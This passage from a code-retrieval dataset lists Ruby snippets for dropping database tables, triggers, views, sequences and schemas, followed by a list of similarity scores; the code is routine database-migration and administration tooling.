"def destroy\n @schema.destroy\n respond_to do |format|\n format.html { redirect_to schemas_url, notice: 'Schema was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @schema.destroy\n respond_to do |format|\n format.html { redirect_to schemas_url, notice: 'Schema was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @schema.destroy\n respond_to do |format|\n format.html { redirect_to schemas_url, notice: 'Schema was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def drop_table\n db.drop_table(table_name)\n end",
"def drop_database_sql(name, opts = {})\n \"DROP DATABASE #{quote_identifier(name)}\"\n end",
"def drop!(db, colls = nil)\n db.in_transaction do |conn|\n schema_tables(conn).each do |table|\n conn.exec \"DROP TABLE IF EXISTS #{table}\"\n end\n end\n end",
"def remove_check(table_name, options)\n name = options.fetch(:name) { raise 'remove_check, :name option required' }\n\n execute <<-SQL\n ALTER TABLE #{quote_table_name(table_name)}\n DROP CONSTRAINT #{quote_column_name(name)}\n SQL\n end",
"def drop_table\n self.connection.drop_table table_name\n end",
"def drop_db\n Mongoid.purge!\n end",
"def drop_database(db_name)\n check_return_code(PureHailDB.ib_database_drop(db_name))\n end",
"def destroy_schema\n Apartment::Tenant.drop tenant\n end",
"def destroy_schema\n Apartment::Tenant.drop tenant\n end",
"def destroy\n [METADATA_TABLE_NAME, RUN_HISTORY_TABLE_NAME,\n DISABLED_MONITOR_TABLE_NAME, MONITOR_INFO_TABLE_NAME].each do |table|\n @db.execute(\"DROP TABLE IF EXISTS #{table}\")\n end\n\n create()\n end",
"def to_sql_drop_namespace(db)\n if db.supports_schemas?\n db.send(:drop_schema_sql, self.name, {})\n else\n \"\"\n end\n end",
"def drop_trigger_sql(table, name, opts=OPTS)\n \"DROP TRIGGER#{' IF EXISTS' if opts[:if_exists]} #{name} ON #{quote_schema_table(table)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def destroy\n @schema_table.destroy\n respond_to do |format|\n format.html { redirect_to schema_tables_url, notice: 'Schema table was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def drop_mysql_database\n MysqlUtils.drop_mysql_database(database_name)\n end",
"def drop_function(function_name, params, options = {})\n SchemaMonkey::Middleware::Migration::CreateFunction.start(connection: self, function_name: function_name, params: params, options: options) do |env|\n function_name = env.function_name\n params = env.params\n options = env.options\n function_type = (options[:function_type] || :function).to_s.upcase\n\n sql = \"DROP #{function_type}\"\n sql += \" IF EXISTS\" if options[:if_exists]\n sql += \" #{function_name}(#{params})\"\n sql += \" CASCADE\" if options[:cascade]\n\n execute sql\n end\n end",
"def destroy\n DATABASE.destroy(self)\n end",
"def db_destroy_mysql(*args)\n\n\t\t\tcmd_db_disconnect()\n\n\t\t\treturn if ! db_find_tools(%W{mysqladmin})\n\n\t\t\tinfo = db_parse_db_uri_mysql(args[0])\n\t\t\targv = []\n\n\t\t\tif (info[:user])\n\t\t\t\targv.push('-u')\n\t\t\t\targv.push(info[:user])\n\t\t\tend\n\n\t\t\tif (info[:pass])\n\t\t\t\targv.push('--password=' + info[:pass])\n\t\t\tend\n\n\t\t\tif (info[:host])\n\t\t\t\targv.push('-h')\n\t\t\t\targv.push(info[:host])\n\t\t\tend\n\n\t\t\tif (info[:port])\n\t\t\t\targv.push('-P')\n\t\t\t\targv.push(info[:port])\n\t\t\tend\n\n\t\t\targv.push(\"-f\")\n\n\t\t\tcargs = argv.map{|c| \"'#{c}' \"}.join\n\t\t\tsystem(\"mysqladmin -f #{cargs} drop #{info[:name]}\")\n\t\tend",
"def drop_and_create_schema_migrations_table\n sql = [\n \"USE #{@database}\",\n 'DROP TABLE IF EXISTS schema_migrations',\n 'CREATE TABLE schema_migrations ( version varchar(255) COLLATE utf8_unicode_ci NOT NULL, UNIQUE KEY unique_schema_migrations (version)) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci'\n ]\n\n run_commands(sql)\n end",
"def drop_view_sql(name, options)\n \"DROP VIEW#{' IF EXISTS' if options[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if options[:cascade]}\"\n end",
"def drop(db)\n\tif $table_exists\n\t\tdb.execute(\"DROP TABLE items;\")\n\t\t$table_exists = false\n\t\tputs \"\\nTable successfully deleted.\"\n\telse\n\t\tputs \"\\nTable successfully deleted.\"\n\tend\nend",
"def delete_table\n table_name = self.to_s.pluralize.underscore\n DATABASE.execute(\"DROP TABLE #{table_name}\")\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_identifier(name)}\"\n end",
"def delete_schema request_pb, options = nil\n raise ::ArgumentError, \"request must be provided\" if request_pb.nil?\n\n verb, uri, query_string_params, body = ServiceStub.transcode_delete_schema_request request_pb\n query_string_params = if query_string_params.any?\n query_string_params.to_h { |p| p.split \"=\", 2 }\n else\n {}\n end\n\n response = @client_stub.make_http_request(\n verb,\n uri: uri,\n body: body || \"\",\n params: query_string_params,\n options: options\n )\n operation = ::Gapic::Rest::TransportOperation.new response\n result = ::Google::Longrunning::Operation.decode_json response.body, ignore_unknown_fields: true\n\n yield result, operation if block_given?\n result\n end",
"def remove_foreign_key(table_name, *args)\n if self.adapter_name == \"PostgreSQL\" or self.adapter_name == \"MySQL\"\n options = args.extract_options!\n name = if options[:name]\n options[:name]\n else\n columns = args.first\n index_name(table_name, :column => Array(columns))\n end\n\n execute \"ALTER TABLE #{quote_table_name(table_name)} DROP FOREIGN KEY #{quote_column_name(name)}\"\n end\n end",
"def drop_function_sql(name, opts=OPTS)\n \"DROP FUNCTION#{' IF EXISTS' if opts[:if_exists]} #{name}#{sql_function_args(opts[:args])}#{' CASCADE' if opts[:cascade]}\"\n end",
"def remove_foreign_key_constraint(table_name, options={})\n constraint_name = options[:name] || \"#{table_name}_ibfk_#{foreign_key}\"\n raise ArgumentError, \"You must specify the constraint name\" if constraint_name.blank?\n \n @connection.remove_foreign_key_constraint(table_name, constraint_name)\n end",
"def drop_audit_schema!\n @config[:drop_audit_schema] = true\n end",
"def delete(name)\n @driver.deleteRule([name])\n end",
"def drop_rule(name, table)\n execute \"DROP RULE #{quote_rule(name)} ON #{quote_table_name(table)};\"\n end",
"def clean_schema\n # AppControl.restart_server # if Rails.env.production?\n ActiveRecord::Base.connection.schema_cache.clear!\n end",
"def drop_table?(*names)\n options = names.last.is_a?(Hash) ? names.pop : OPTS\n if supports_drop_table_if_exists?\n options = options.merge(:if_exists=>true)\n names.each do |name|\n drop_table(name, options)\n end\n else\n names.each do |name|\n drop_table(name, options) if table_exists?(name)\n end\n end\n nil\n end",
"def drop_constraint(table, name)\n current_instructions << Instructions::DropConstraint.new(\n table: table,\n name: name,\n )\n end",
"def alter_table(name, *)\n super\n remove_cached_schema(name)\n nil\n end",
"def drop_language_sql(name, opts=OPTS)\n \"DROP LANGUAGE#{' IF EXISTS' if opts[:if_exists]} #{name}#{' CASCADE' if opts[:cascade]}\"\n end",
"def drop_sequence(name)\n execute drop_sequence_sql(name)\n end",
"def remove(name)\n sudo \"rm -rf #{god_confd}/#{name}\"\n end",
"def drop_sequence(name)\n name = quote_name(name)\n sql = \"DROP SEQUENCE #{name}\"\n execute(sql)\n end",
"def migrate!\n @logger.fine('Dropping schema...')\n\n migrate(0) # migrate to version 0.\n migrate # migrate to latest version.\n end",
"def destroy\n dbf.destroy\n rescue MissingSource\n ensure\n freeze\n end",
"def drop_database\n puts \"Droping database #{@db_name}...\"\n begin\n client = Mysql2::Client.new(:host => @db_host, :username => @db_user, :password => @db_pass)\n client.query(\"DROP DATABASE IF EXISTS #{@db_name}\")\n client.close\n rescue Exception => e\n puts \"An error occurred\\n #{e}\"\n end\n end",
"def uninstall\n if installed?\n destroy_database_directory\n destroy_database_configuration_file\n end\n end",
"def drop_view_sql(name, opts=OPTS)\n \"DROP #{'MATERIALIZED ' if opts[:materialized]}VIEW#{' IF EXISTS' if opts[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def drop_versioned_table\n self.connection.drop_table versioned_table_name\n end",
"def destroy!\n Dropio::Resource.client.delete_drop(self)\n end",
"def drop_db( path_names )\n path_name_tokens = path_names.split( \"|\" )\n zone = path_name_tokens[1]\n connect_for( zone ) do |con|\n db_name = path_name_tokens.pop\n con.drop_database( db_name )\n end\n end",
"def drop(opts = {})\n client.send(:with_session, opts) do |session|\n maybe_drop_emm_collections(opts[:encrypted_fields], client, session) do\n temp_write_concern = write_concern\n write_concern = if opts[:write_concern]\n WriteConcern.get(opts[:write_concern])\n else\n temp_write_concern\n end\n context = Operation::Context.new(client: client, session: session)\n operation = Operation::Drop.new({\n selector: { :drop => name },\n db_name: database.name,\n write_concern: write_concern,\n session: session,\n })\n do_drop(operation, session, context)\n end\n end\n end",
"def drop_proc(name, columns=[], cascade=false)\n execute \"DROP FUNCTION #{name.to_sql_name}(#{columns.collect {|column| column}.join(\", \")}) #{cascade_or_restrict(cascade)};\"\n end",
"def drop_proc(name, columns=[], cascade=false)\n execute \"DROP FUNCTION #{name.to_sql_name}(#{columns.collect {|column| column}.join(\", \")}) #{cascade_or_restrict(cascade)};\"\n end",
"def delete_database(connection_string, db_name)\n drop_sql = <<-SQL\n DROP DATABASE #{db_name};\n SQL\n\n run \"#{connection_string} --execute=\\\"#{drop_sql}\\\"\"\nend",
"def drop_view(view_name, options = {})\n SchemaMonkey::Middleware::Migration::DropView.start(connection: self, view_name: view_name, options: options) do |env|\n view_name = env.view_name\n options = env.options\n materialized = options[:materialized] ? 'MATERIALIZED' : ''\n sql = \"DROP #{materialized} VIEW\"\n sql += \" IF EXISTS\" if options[:if_exists]\n sql += \" #{quote_table_name(view_name)}\"\n execute sql\n end\n end",
"def delete_kiosks\n @db.execute(\"DROP TABLE Kiosks\")\n end",
"def drop_sequence(*args)\n options = args.extract_options!\n args.flatten!\n\n sql = 'DROP SEQUENCE '\n sql << 'IF EXISTS ' if options[:if_exists]\n sql << Array.wrap(args).collect { |s| quote_sequence(s) }.join(', ')\n sql << ' CASCADE' if options[:cascade]\n execute(\"#{sql};\")\n end",
"def delete_database(database_name)\n @glue_client.delete_database(name: database_name)\n rescue Aws::Glue::Errors::ServiceError => e\n @logger.error(\"Glue could not delete database: \\n#{e.message}\")\n end",
"def drop(path = nil, opts = {})\n array_opts = []\n array_opts << \"--all\" if opts[:all]\n array_opts << \"--force\" if opts[:force]\n\n command(\"drop #{escape(path)}\", array_opts)\n end",
"def drop_event_trigger(name, options = {})\n sql = 'DROP EVENT TRIGGER '\n sql << 'IF EXISTS ' if options[:if_exists]\n sql << quote_generic(name)\n sql << ' CASCADE' if options[:cascade]\n execute(\"#{sql};\")\n end",
"def destroy\n return if @name.nil?\n delete_rest \"rules/#{@name}\"\n end",
"def drop_sequence(name)\n self.execute(\"DROP TABLE IF EXISTS %s_sequence\" % name)\n end",
"def destroy_constraints_statement(table_name, constraint_name)\n <<-EOS.compress_lines\n ALTER TABLE #{quote_table_name(table_name)}\n DROP CONSTRAINT #{quote_constraint_name(constraint_name)}\n EOS\n end",
"def unlink\n self.transaction do\n self.class.factory.model.connection.execute <<-SQL\n ALTER TABLE #{name} NO INHERIT #{self.class.factory.model.table_name};\n ALTER TABLE #{name} RENAME TO #{name}_unlinked;\n SQL\n self.destroy\n end\n end",
"def delete_bridge_model(name, headers=default_headers)\n @logger.info(\"Deleting the \\\"#{name}\\\" Bridge Model.\")\n delete(\"#{@api_url}/models/#{encode(name)}\", headers)\n end"
] |
[
"0.8012164",
"0.78485155",
"0.78375214",
"0.7437326",
"0.7366318",
"0.72286713",
"0.7122654",
"0.702088",
"0.69215715",
"0.672576",
"0.661924",
"0.6551986",
"0.6446336",
"0.6397896",
"0.63680106",
"0.629387",
"0.62173814",
"0.6208451",
"0.6206428",
"0.6178284",
"0.6169206",
"0.6162189",
"0.6128806",
"0.61265737",
"0.60457695",
"0.5943767",
"0.5922501",
"0.5917542",
"0.59151995",
"0.5859275",
"0.5825405",
"0.5825405",
"0.5823832",
"0.57804435",
"0.57550114",
"0.57550114",
"0.5720045",
"0.5707434",
"0.5707434",
"0.5707434",
"0.5694628",
"0.56902283",
"0.56692517",
"0.56502956",
"0.5636745",
"0.5516031",
"0.5503439",
"0.5478035",
"0.5478035",
"0.5453135",
"0.5432388",
"0.54260045",
"0.5396281",
"0.5385312",
"0.5373159",
"0.53643334",
"0.5358816",
"0.535798",
"0.53510386",
"0.5334705",
"0.53318095",
"0.53317267",
"0.53290904",
"0.5319545",
"0.53189",
"0.53040576",
"0.53017074",
"0.52854973",
"0.5284623",
"0.5281995",
"0.52671367",
"0.52666616",
"0.5233103",
"0.5227858",
"0.52177256",
"0.52054954",
"0.51968676",
"0.51945907",
"0.51744175",
"0.51658094",
"0.51546764",
"0.51521915",
"0.51394325",
"0.5137744",
"0.5130169",
"0.5122741",
"0.5119782",
"0.5119782",
"0.5118755",
"0.5103465",
"0.5099686",
"0.50973284",
"0.50970066",
"0.50968754",
"0.50948685",
"0.5077714",
"0.5077516",
"0.5076545",
"0.50684243",
"0.50567955"
] |
0.7423064
|
4
|
Drops a trigger from the database. Arguments: table :: table from which to drop the trigger name :: name of the trigger to drop opts :: options hash: :cascade :: Drop other objects depending on this trigger. :if_exists :: Don't raise an error if the trigger doesn't exist.
|
def drop_trigger(table, name, opts=OPTS)
self << drop_trigger_sql(table, name, opts)
end
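
A minimal usage sketch of the method above, assuming Sequel's postgres adapter; the connection URL, table, and trigger name are hypothetical:

require 'sequel'

DB = Sequel.connect('postgres://localhost/mydb') # hypothetical URL

# Executes: DROP TRIGGER IF EXISTS audit_stamp ON "accounts"
DB.drop_trigger(:accounts, :audit_stamp, if_exists: true)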
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def drop_trigger(table_name, trigger_name, options = {})\n SchemaMonkey::Middleware::Migration::CreateTrigger.start(connection: self, table_name: table_name, trigger_name: trigger_name, options: options) do |env|\n table_name = env.table_name\n trigger_name = env.trigger_name\n options = env.options\n\n sql = \"DROP TRIGGER\"\n sql += \" IF EXISTS\" if options[:if_exists]\n sql += \" #{quote_table_name(trigger_name)} ON #{quote_table_name(table_name)}\"\n sql += \" CASCADE\" if options[:cascade]\n\n execute sql\n end\n end",
"def drop_trigger_sql(table, name, opts=OPTS)\n \"DROP TRIGGER#{' IF EXISTS' if opts[:if_exists]} #{name} ON #{quote_schema_table(table)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def remove_trigger(table, name, options={})\n options[:name] = name\n execute \"DROP TRIGGER #{trigger_name(table, [], options).to_sql_name} ON #{table} #{cascade_or_restrict(options[:deep])};\"\n end",
"def remove_trigger(table, name, options={})\n options[:name] = name\n execute \"DROP TRIGGER #{trigger_name(table, [], options).to_sql_name} ON #{table} #{cascade_or_restrict(options[:deep])};\"\n end",
"def remove_trigger(table_name, proc_name, options = {})\n\n end",
"def drop_event_trigger(name, options = {})\n sql = 'DROP EVENT TRIGGER '\n sql << 'IF EXISTS ' if options[:if_exists]\n sql << quote_generic(name)\n sql << ' CASCADE' if options[:cascade]\n execute(\"#{sql};\")\n end",
"def drop_trigger(database, table)\n trigger_name = \"#{options(table)[:rep_prefix]}_#{table}\"\n session.send(database).drop_replication_trigger trigger_name, table\n end",
"def drop_replication_trigger(trigger_name, table_name)\n %w(insert update delete).each do |action|\n execute \"DROP TRIGGER `#{trigger_name}_#{action}`;\"\n end\n execute \"DROP PROCEDURE `#{trigger_name}`;\"\n end",
"def drop_table(table_name, **options)\n schema_cache.clear_data_source_cache!(table_name.to_s)\n execute \"DROP#{' TEMPORARY' if options[:temporary]} TABLE#{' IF EXISTS' if options[:if_exists]} #{quote_table_name(table_name)}#{' CASCADE' if options[:force] == :cascade}\"\n end",
"def delete_table(table)\r\n referenced_by = references(table)\r\n if !referenced_by.empty?\r\n puts \"unable to delete table \\'#{table}\\' because it is referenced by table(s):\"\r\n referenced_by.each{|table_name| puts \"#{table_name}\"}\r\n false\r\n elsif table_exists?(table)\r\n delete_table_cmd = \"DROP TABLE IF EXISTS #{table}\"\r\n @db.execute(delete_table_cmd)\r\n puts \"#{table} was deleted\"\r\n true\r\n end\r\n end",
"def drop_function(function_name, params, options = {})\n SchemaMonkey::Middleware::Migration::CreateFunction.start(connection: self, function_name: function_name, params: params, options: options) do |env|\n function_name = env.function_name\n params = env.params\n options = env.options\n function_type = (options[:function_type] || :function).to_s.upcase\n\n sql = \"DROP #{function_type}\"\n sql += \" IF EXISTS\" if options[:if_exists]\n sql += \" #{function_name}(#{params})\"\n sql += \" CASCADE\" if options[:cascade]\n\n execute sql\n end\n end",
"def drop_function_sql(name, opts=OPTS)\n \"DROP FUNCTION#{' IF EXISTS' if opts[:if_exists]} #{name}#{sql_function_args(opts[:args])}#{' CASCADE' if opts[:cascade]}\"\n end",
"def drop_table_sql(name, options)\n \"DROP TABLE#{' IF EXISTS' if options[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if options[:cascade]}\"\n end",
"def remove_trigger(id)\n\t transmit(:remove_trigger, id)\n\t triggers.delete(id)\n\tend",
"def drop_table\n db.drop_table(table_name)\n end",
"def drop_table(table)\n current_instructions << Instructions::DropTable.new(table: table)\n end",
"def drop_foreign_key(table, field)\n execute \"ALTER TABLE #{table} DROP FOREIGN KEY #{constraint_name(table, field)}\"\n end",
"def drop(db)\n\tif $table_exists\n\t\tdb.execute(\"DROP TABLE items;\")\n\t\t$table_exists = false\n\t\tputs \"\\nTable successfully deleted.\"\n\telse\n\t\tputs \"\\nTable successfully deleted.\"\n\tend\nend",
"def down\nexecute <<-SQL\n\tDROP TRIGGER IF EXISTS add_animal;\nSQL\n\nexecute <<-SQL\n\tDROP TRIGGER IF EXISTS update_animal;\nSQL\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS all_animals\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_species\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_name\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_tank\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_habitat\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_birthday\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS create_animal\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS update_animal\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS delete_animal\nSQL\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_animal\nSQL\nexecute <<-SQL\n DROP FUNCTION IF EXISTS get_animal_count\nSQL\n end",
"def drop_table(tablename)\r\n raise(ArgumentError, 'Table name must be a symbol!') unless \\\r\n tablename.is_a?(Symbol)\r\n raise \"Table does not exist!\" unless table_exists?(tablename)\r\n @table_hash.delete(tablename)\r\n\r\n return @engine.delete_table(tablename)\r\n end",
"def delete_table(table, options={})\n return send_message(SkyDB::Message::DeleteTable.new(table, options))\n end",
"def drop_table(table)\n connection.drop_collection(database,table)\n end",
"def drop_table\n self.connection.drop_table table_name\n end",
"def drop_table(table_name, options = {})\n table_name, options = extract_table_options(table_name, options)\n super(table_name, **options)\n end",
"def remove_foreign_key(table_name, *args)\n if self.adapter_name == \"PostgreSQL\" or self.adapter_name == \"MySQL\"\n options = args.extract_options!\n name = if options[:name]\n options[:name]\n else\n columns = args.first\n index_name(table_name, :column => Array(columns))\n end\n\n execute \"ALTER TABLE #{quote_table_name(table_name)} DROP FOREIGN KEY #{quote_column_name(name)}\"\n end\n end",
"def drop_table_statement(repository, model)\n \"DROP TABLE #{quote_table_name(model.storage_name(repository.name))}\"\n end",
"def sql_for_remove\n \"DROP FUNCTION IF EXISTS #{proname}(#{get_function_args})\"\n end",
"def drop_function(function_name, options = {})\n function_name = full_function_name(function_name, options)\n\n execute \"DROP FUNCTION #{function_name}\"\n end",
"def drop_table(name)\n not_exist(name)\n\n ORM::DBConnection.new(model_name(name)).remove_table(name)\n File.delete(\"app/services/db/tables/#{name}.json\")\n end",
"def supports_drop_table_if_exists?\n true\n end",
"def supports_drop_table_if_exists?\n true\n end",
"def remove(table,cond)\n connection.remove(path(table),cond)\n end",
"def destroy!\n drop_ddl = tables.map(&:name).map do |t|\n \"drop table if exists #{t};\\n\"\n end.join\n ActiveRecord::Base.connection.execute(drop_ddl)\n end",
"def destroy(table)\n end",
"def drop_table?(*names)\n options = names.last.is_a?(Hash) ? names.pop : OPTS\n if supports_drop_table_if_exists?\n options = options.merge(:if_exists=>true)\n names.each do |name|\n drop_table(name, options)\n end\n else\n names.each do |name|\n drop_table(name, options) if table_exists?(name)\n end\n end\n nil\n end",
"def remove_check(table_name, options)\n name = options.fetch(:name) { raise 'remove_check, :name option required' }\n\n execute <<-SQL\n ALTER TABLE #{quote_table_name(table_name)}\n DROP CONSTRAINT #{quote_column_name(name)}\n SQL\n end",
"def drop_proc(name, columns=[], cascade=false)\n execute \"DROP FUNCTION #{name.to_sql_name}(#{columns.collect {|column| column}.join(\", \")}) #{cascade_or_restrict(cascade)};\"\n end",
"def drop_proc(name, columns=[], cascade=false)\n execute \"DROP FUNCTION #{name.to_sql_name}(#{columns.collect {|column| column}.join(\", \")}) #{cascade_or_restrict(cascade)};\"\n end",
"def drop_rule(name, table)\n execute \"DROP RULE #{quote_rule(name)} ON #{quote_table_name(table)};\"\n end",
"def drop_function(function_name, options)\n\n end",
"def delete_table\n table_name = self.to_s.pluralize.underscore\n DATABASE.execute(\"DROP TABLE #{table_name}\")\n end",
"def drop_versioned_table\n self.connection.drop_table versioned_table_name\n end",
"def drop_join_table(hash, options=OPTS)\n drop_table(join_table_name(hash, options), options)\n end",
"def drop\n Statements::DropFunction.new(context: self)\n end",
"def drop_function(name, opts=OPTS)\n self << drop_function_sql(name, opts)\n end",
"def drop_column(table, *args)\n alter_table(table) {drop_column(*args)}\n end",
"def drop_column(table, *args)\n alter_table(table) {drop_column(*args)}\n end",
"def down\n drop_table TABLE_NAME\n end",
"def drop_table(klass)\n # Remove leftover data from some join tabkes.\n klass.relations.each do |rel|\n if rel.class.to_s == \"Og::JoinsMany\" and rel.join_table\n target_class = rel.target_class\n exec \"DELETE FROM #{rel.join_table}\"\n end\n end\n exec \"DROP TABLE #{klass.table}\"\n end",
"def delete_trigger(trigger_id)\n http_delete \"/triggers/#{trigger_id}\"\n end",
"def remove_foreign_key_constraint(table_name, options={})\n constraint_name = options[:name] || \"#{table_name}_ibfk_#{foreign_key}\"\n raise ArgumentError, \"You must specify the constraint name\" if constraint_name.blank?\n \n @connection.remove_foreign_key_constraint(table_name, constraint_name)\n end",
"def delete table\n table = table.to_sym\n @lookup = @lookup.reject { |k, v| k == table }\n @schema = @schema.reject { |k, v| k == table }\n nil\n end",
"def remove_trigger_from_service(*args)\n raise ArgumentError.new('The method `remove_trigger_from_service` requires 2 arguments (service-id and trigger-id).') if args.size != 2\n self.class.delete(\"/services/#{args[0]}/triggers/#{args[-1]}.json?apikey=#{apikey}\")\n end",
"def drop_foreign_key(from_table, from_column)\n execute [ \"alter table #{quote_table_name from_table}\",\n \"drop foreign key #{constraint_name from_table, from_column}\"\n ].join(' ')\n end",
"def delete_queries\n [\n \"DROP TRIGGER tr_#{suffix} ON #{src_table};\",\n \"DROP FUNCTION fn_#{suffix}();\",\n \"DROP TRIGGER tr_#{suffix}_cleaner ON #{surveys_table};\",\n \"DROP FUNCTION fn_#{suffix}_cleaner();\"\n ]\n end",
"def drop_table(*names)\n options = names.last.is_a?(Hash) ? names.pop : OPTS \n names.each do |n|\n execute_ddl(drop_table_sql(n, options))\n remove_cached_schema(n)\n end\n nil\n end",
"def DeleteTrigger id\n \n APICall(path: \"triggers/#{id}.json\",method: 'DELETE')\n \n end",
"def drop_table(table_name = temporary_table_name)\n ::RailsRedshiftReplicator.connection.exec \"drop table if exists #{table_name}\"\n end",
"def invoke_drop(method_or_key); end",
"def delete_table\n TinyDyno::Adapter.delete_table(table_name: self.table_name)\n end",
"def delete_traps\n @db.execute(\"DROP TABLE Traps\")\n end",
"def drop_view_sql(name, options)\n \"DROP VIEW#{' IF EXISTS' if options[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if options[:cascade]}\"\n end",
"def down\n \t# Example\n \t# Easy to undo something you create, but this doesn't work\n \t# because it is hard to fix mistakes.\n \t# drop_table :pictures\n end",
"def drop\n do_callback(:before_drop)\n collection.drop\n do_callback(:after_drop)\n end",
"def drop!(db, colls = nil)\n db.in_transaction do |conn|\n schema_tables(conn).each do |table|\n conn.exec \"DROP TABLE IF EXISTS #{table}\"\n end\n end\n end",
"def create_trigger(table, name, function, opts=OPTS)\n self << create_trigger_sql(table, name, function, opts)\n end",
"def drop_function(name, custom_drop_statement = nil)\n Scenic.database.drop_function(name, custom_drop_statement)\n end",
"def unlink\n self.transaction do\n self.class.factory.model.connection.execute <<-SQL\n ALTER TABLE #{name} NO INHERIT #{self.class.factory.model.table_name};\n ALTER TABLE #{name} RENAME TO #{name}_unlinked;\n SQL\n self.destroy\n end\n end",
"def disable_trigger(trigger = 'ALL')\n connection.disable_trigger(table_name, trigger)\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_identifier(name)}\"\n end",
"def delete_table(table_id); delete(\"tables/#{table_id}\"); nil; end",
"def add_trigger(table, events, options={})\n events += [:row] if options.delete(:row)\n events += [:before] if options.delete(:before)\n trigger = TriggerDefinition.new(0, table, options[:name], events, options[:function])\n execute trigger.to_sql_create\n end",
"def add_trigger(table, events, options={})\n events += [:row] if options.delete(:row)\n events += [:before] if options.delete(:before)\n trigger = TriggerDefinition.new(0, table, options[:name], events, options[:function])\n execute trigger.to_sql_create\n end",
"def purge\n @db.execute( \"DELETE FROM #{TABLE_NAME};\" )\n end",
"def drop_schema_sql(name, opts=OPTS)\n \"DROP SCHEMA#{' IF EXISTS' if opts[:if_exists]} #{quote_identifier(name)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def remove_foreign_key(from_table, from_column, to_table)\n constraint_name = \"fk_#{from_table}_#{from_column}\"\n # check if constraint already exist\n count = ActiveRecord::Base.connection.select_value(\"select count(1) from pg_constraint where conname='#{constraint_name}'\")\n\n unless count.to_i == 0\n execute %{ALTER TABLE #{from_table} DROP CONSTRAINT #{constraint_name}}\n end\n end",
"def drop_table?\n db.drop_table?(table_name)\n end",
"def drop_constraint(table, name)\n current_instructions << Instructions::DropConstraint.new(\n table: table,\n name: name,\n )\n end",
"def drop\n\n\t\t# for user\n\t\tif(!current_user.admin)\n\t\t\tBook.where('owner_id' => current_user.id).delete_all\n\t\telse\n\t\t\tBook.delete_all\n\t\tend\n\t\t\n\t\tflash[:success] = \"Deleted table book!\"\n\t\tredirect_to '/books'\n\tend",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_schema_table(name)}\"\n end",
"def remove_reference(table, ref_name, **kwargs)\n current_instructions << Instructions::RemoveReference.new(\n table: table,\n ref_name: ref_name,\n **kwargs,\n )\n end",
"def delete_table(table_name, options = {})\n call(:delete, table_uri(table_name, new_query(options)), nil, {}, options)\n nil\n end",
"def create_trigger(table_name, proc_name, event, options = {})\n\n end",
"def uninstall_on!(db, options = {})\n sql = \"\"\n all_objects_in_order.reverse.each{|o| \n begin\n sql = o.to_clean_sql(db)\n execute_ddl(db, sql, options)\n rescue Sequel::Error => ex\n puts \"Ignoring: #{ex.message}\" if options[:verbose]\n end\n }\n db\n end",
"def to_drop_constraint_sql(db)\n if db.supports_external_drop_constraints?\n gen = ::Sequel::Schema::AlterTableGenerator.new(db)\n gen.drop_constraint(self.name)\n db.send(:alter_table_sql_list, relvar.namespace_qualified_name(db), gen.operations)[0]\n else\n \"\"\n end\n end",
"def pgt_trigger(table, trigger_name, function_name, events, definition, opts={})\n create_function(function_name, definition, :language=>:plpgsql, :returns=>:trigger, :replace=>true)\n create_trigger(table, trigger_name, function_name, :events=>events, :each_row=>true, :after=>opts[:after])\n end",
"def drop\n File.unlink @file if File.exist?(@file)\n self\n end",
"def test_drop_table_if_exists\n connection.create_table(:testings)\n assert connection.table_exists?(:testings)\n connection.drop_table(:testings, if_exists: true)\n assert_not connection.table_exists?(:testings)\n end",
"def delete_hook(id)\n delete(\"/hooks/#{id}\")\n end",
"def drop_tables!\n migrate(:down)\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_schema_table(name)}\"\n end",
"def remove(name)\n if hook = by_name(name)\n hook.destroy!\n end\n end",
"def drop\n ensure_service!\n service.drop_database instance_id, database_id\n true\n end",
"def drop\n ensure_service!\n service.drop_database instance_id, database_id\n true\n end",
"def destroy!\n Dropio::Resource.client.delete_drop(self)\n end",
"def create_trigger_sql(table, name, function, opts=OPTS)\n events = opts[:events] ? Array(opts[:events]) : [:insert, :update, :delete]\n whence = opts[:after] ? 'AFTER' : 'BEFORE'\n if filter = opts[:when]\n raise Error, \"Trigger conditions are not supported for this database\" unless supports_trigger_conditions?\n filter = \" WHEN #{filter_expr(filter)}\"\n end\n \"CREATE #{'OR REPLACE ' if opts[:replace]}TRIGGER #{name} #{whence} #{events.map{|e| e.to_s.upcase}.join(' OR ')} ON #{quote_schema_table(table)}#{' FOR EACH ROW' if opts[:each_row]}#{filter} EXECUTE PROCEDURE #{function}(#{Array(opts[:args]).map{|a| literal(a)}.join(', ')})\"\n end",
"def invoke_drop(key); end",
"def unlink_from(table)\n invalidate_cache\n remove_layers_from(table)\n end",
"def delete(key)\n run_hook(:before_delete)\n db.delete(key)\n run_hook(:after_delete)\n end",
"def delete_buttons\n @db.execute(\"DROP TABLE Buttons\")\n end"
] |
[
"0.7669092",
"0.7631279",
"0.7302634",
"0.7302634",
"0.69826895",
"0.670343",
"0.66852194",
"0.6222981",
